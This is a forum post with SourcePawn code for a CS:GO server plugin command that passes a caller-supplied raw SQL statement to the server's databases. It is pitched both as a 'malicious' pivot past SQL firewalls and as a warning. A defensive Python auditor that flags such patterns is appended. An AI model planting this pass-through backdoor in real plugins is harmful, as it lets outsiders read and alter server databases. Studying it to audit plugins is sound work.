[SNIPPET] Malicious Activities
OSWO (Senior Member, Join Date: Jul 2015, Location: United Kingdom, London)
10-10-2016, 17:30, #1

You want your plugin to become Malicious? You want anyone to gain access over everything? SQL server firewalled? No Problem! Introducing all new!

So what this kinda shows is how a CS:GO server can be used as a VPN into a SQL server. Some SQL servers have a firewall to only allow inbound connections from a CS:GO server, but this shows you how to manipulate it.

So - at the end of the day - be very aware of who and what you give users to in your servers. There could theoretically be a way to actually leave the confinement of the CS:GO server and access the whole VPS / Dedi entirely, but I haven't got up to that yet : ^)

Note: PrintToConsole has a limit on how much it can print, I could have it push to a stack and print a few at a time until it's all printed, but you can figure that one out : ^)

Some notable commands:

Code:
sm_test "example" "show tables;"
sm_test "example" "desc a_table_name;"
sm_test "example" "INSERT INTO exampe_example VALUES ('STEAM_1:1:1111', 100, 0.1, 'more text');"

PHP Code:
public Action command_test(int I_Client, int I_Args) {
    char C_Server[64], C_Statement[512], C_Error[512];

    // Arg 1: database config name, arg 2: SQL statement, both taken from the caller
    GetCmdArg(1, C_Server, sizeof(C_Server));
    GetCmdArg(2, C_Statement, sizeof(C_Statement));

    Database New = SQL_Connect(C_Server, true, C_Error, sizeof(C_Error));

    if (New != INVALID_HANDLE) {
        PrintToChat(I_Client, "Connection To %s Successful", C_Server);

        // The statement is passed to the database unchanged
        SQL_TQuery(New, sqlTest, C_Statement, GetClientUserId(I_Client), DBPrio_High);
        PrintToChat(I_Client, "Executing: %s", C_Statement);
    } else {
        PrintToChat(I_Client, "Error: %s", C_Error);
    }

    return Plugin_Handled;
}

public void sqlTest(Handle owner, Handle hndl, char[] error, int I_UserID) {
    char C_buffer[512], C_String[512], C_FieldName[64];
    int I_Client = GetClientOfUserId(I_UserID);

    if (IsClientInGame(I_Client)) {
        if (hndl != INVALID_HANDLE) {
            PrintToChat(I_Client, "Executed");

            if (SQL_GetRowCount(hndl) > 0) {
                int I_Fields = SQL_GetFieldCount(hndl);

                // Header line: column names
                for (int i = 0; i < I_Fields; i++) {
                    SQL_FieldNumToName(hndl, i, C_FieldName, sizeof(C_FieldName));
                    Format(C_buffer, sizeof(C_buffer), "%s%s: ", C_buffer, C_FieldName);
                }

                PrintToConsole(I_Client, C_buffer);
                Format(C_buffer, sizeof(C_buffer), "");

                // One console line per result row
                while (SQL_FetchRow(hndl)) {
                    for (int i = 0; i < I_Fields; i++) {
                        SQL_FetchString(hndl, i, C_String, sizeof(C_String));
                        Format(C_buffer, sizeof(C_buffer), "%s%s, ", C_buffer, C_String);
                    }

                    PrintToConsole(I_Client, C_buffer);
                    Format(C_buffer, sizeof(C_buffer), "");
                }
            }
        } else {
            PrintToChat(I_Client, error);
        }
    }
}

Example Taken From TangoTimer:
__________________
SourceTimer | WeaponSkins++ | BasePlugins++ https://github.com/OSCAR-WOS

Last edited by OSWO; 10-11-2016 at 05:01. Reason: Some
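
For server owners reviewing third-party plugins before installing them, the pattern in the post above (a command argument reaching `SQL_Connect` or `SQL_TQuery` unchanged) can be flagged in plugin source. This is an added example, not OSWO's code; it is a line-based heuristic, and the sample plugin text, the function name `audit`, and the choice to treat `SQL_EscapeString` output as clean are assumptions.

```python
import re

# Natives that read caller-supplied command arguments into a buffer.
SOURCE = re.compile(r"\bGetCmdArg\s*\(\s*[^,]+,\s*(\w+)|\bGetCmdArgString\s*\(\s*(\w+)")
# Natives that copy or format data into their first argument.
COPY = re.compile(r"\b(?:Format|FormatEx|strcopy|StrCat)\s*\(\s*(\w+)\s*,(.*)\)")
# Natives that pick a database config or send a statement.
SINK = re.compile(r"\b(SQL_T?Connect|SQL_TQuery|SQL_Query|SQL_FastQuery)\s*\((.*)\)")
IDENT = re.compile(r"[A-Za-z_]\w*")
STRING = re.compile(r'"(?:\\.|[^"\\])*"')

def audit(source):
    """Return (line, native, tainted_buffers) for each risky database call."""
    findings, tainted = [], set()
    for lineno, raw in enumerate(source.splitlines(), 1):
        if raw.startswith("}"):          # end of a top-level function: new scope
            tainted.clear()
            continue
        line = STRING.sub('""', raw).split("//")[0]   # drop literals and comments
        m = SOURCE.search(line)
        if m:
            tainted.add(m.group(1) or m.group(2))
        m = COPY.search(line)
        if m and tainted & set(IDENT.findall(m.group(2))):
            tainted.add(m.group(1))      # destination inherits the taint
        m = SINK.search(line)
        if m:
            hit = sorted(tainted & set(IDENT.findall(m.group(2))))
            if hit:
                findings.append((lineno, m.group(1), hit))
    return findings

# Constructed sample: one pass-through command and one escaped lookup.
SAMPLE = '''\
public Action cmd_raw(int client, int args) {
    char conf[64], stmt[512], err[256];
    GetCmdArg(1, conf, sizeof(conf));
    GetCmdArg(2, stmt, sizeof(stmt));
    Database db = SQL_Connect(conf, true, err, sizeof(err));
    SQL_TQuery(db, OnDone, stmt, GetClientUserId(client));
}
public Action cmd_lookup(int client, int args) {
    char name[64], safe[129], query[256];
    GetCmdArg(1, name, sizeof(name));
    SQL_EscapeString(g_db, name, safe, sizeof(safe));
    Format(query, sizeof(query), "SELECT pts FROM ranks WHERE name = '%s'", safe);
    SQL_TQuery(g_db, OnDone, query, GetClientUserId(client));
}
'''
```

A finding is a prompt for manual review, not proof of a backdoor; a plugin shipped only as a compiled `.smx` has to be checked some other way.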